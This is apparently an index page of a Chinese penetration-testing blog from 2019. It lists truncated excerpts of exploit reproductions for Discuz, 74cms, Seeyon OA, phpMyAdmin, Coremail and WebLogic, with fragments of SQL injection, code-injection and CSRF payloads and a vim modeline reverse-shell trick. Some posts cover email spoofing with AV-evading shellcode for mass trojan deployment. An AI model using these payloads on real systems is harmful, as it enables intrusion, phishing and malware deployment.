Discuz!X系列全版本后台sql注入复现

Discuz!X系列全版本后台sql注入复现

圈子某位大佬公布的0day,拿来刷一刷,漏洞分析请移步大佬文章。大佬链接0x01 环境准备1、首先去码云下载最新版本的discuz(DiscuzX 3.4 R20191201)。2、将upaod放置到网站目录下,访问安装目录安装即可。0x02 漏洞复现点击站长--UCenter设置 点击最下面的提交进行抓包判断列数1' order by 1 //返回正确 1' order by 2...

渗透测试 2019-12-11 PM 58次 0条
74cms v4.2.1-v4.2.129-后台getshell漏洞复现

74cms v4.2.1-v4.2.129-后台getshell漏洞复现

0x00 影响范围v4.2.1-v4.2.1290x01 环境搭建1. 先去官网下载 骑士人才系统基础版(安装包)2.将下载好的包进行安装0x02 复现过程当前版本v4.2.111点加工具,点击风格模板Payload: http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo...

渗透测试 2019-12-09 PM 43次 0条
Discuz ML! V3.X 代码注入漏洞检测脚本

Discuz ML! V3.X 代码注入漏洞检测脚本

漏洞描述Discuz ML! V3.X存在代码注入漏洞,攻击者通过精心构建的请求报文可以直接执行恶意的PHP代码,进一步可获取整个网站的服务器权限。漏洞影响版本:Discuz!ML v.3.4Discuz!ML v.3.2Discuz!ML v.3.3# -*- coding: utf-8 -*- #Author: key #Team: Mystery Security Team #...

渗透测试 2019-07-15 PM 45次 0条
致远OA 0day漏洞

致远OA 0day漏洞

检测访问  /seeyon/htmlofficeservlet出现DBSTEP V3.0 0 21 0 htmoffice operate err即存在漏洞利用POST /seeyon/htmlofficeservlet HTTP/1.1 Content-Length: 1121 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows...

渗透测试 2019-06-26 PM 45次 0条
phpmyadmin CSRF Poc  CVE-2019-12616

phpmyadmin CSRF Poc CVE-2019-12616

CVE-2019-12616 POChttp://23.83.62.8:999//tbl_sql.php?sql_query=INSERT+INTO+'pma__bookmark'+('id'%2C+'dbase'%2C+'user'%2C+'label'%2C+'query')+VALUES+(DAYOFWEEK('')%2C+''%2C+''%2C+''%2C+'')&show_...

渗透测试 2019-06-19 PM 23次 0条
coremail漏洞检测POC

coremail漏洞检测POC

单个检测POC#-*- Coding: utf-8 -*- #Author: Vulkey_Chen #Email: gh0stkey@hi-ourlife.com #Website: www.hi-ourlife.com #About: mailsms config dump PoC import requests,sys def mailsmsPoC(url): ...

渗透测试 2019-06-18 PM 49次 0条
Weblogic最新wls-wsat组件远程命令执行漏洞POC

Weblogic最新wls-wsat组件远程命令执行漏洞POC

漏洞情况分析WebLogic Server是美国甲骨文(Oracle)公司开发的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。wls9-async组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精...

渗透测试 2019-06-18 PM 37次 0条
swaks伪造邮件+免杀shellcode=批量木马上线

swaks伪造邮件+免杀shellcode=批量木马上线

0x00:前言 伪造邮件可以参考文章《伪造任意发件人进行邮件钓鱼》  其实也可以利用这个《利用office宏反弹shell》今天普及新知识点0x01:简介  Swaks是由John Jetmore编写和维护的一种功能强大,灵活,可脚本化,面向事务的SMTP测试工具。可向任意目标发送任意内容的邮件。关于名字 “swaks”这个名字是”SWiss Army Knife Smtp”的首字母缩略词...

渗透测试 2019-06-15 PM 38次 0条
丢给你一个txt并同时获取你shell

丢给你一个txt并同时获取你shell

0x01:复现 1、kali复现桌面新建立一个poc.txt放入以下代码,并用vim执行。代码::!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source! %"):fdl=0:fdt="效果图:成功执行反弹shell脚本新建立一个shell.txt放入以下代码,...

渗透测试 2019-06-15 PM 44次 1条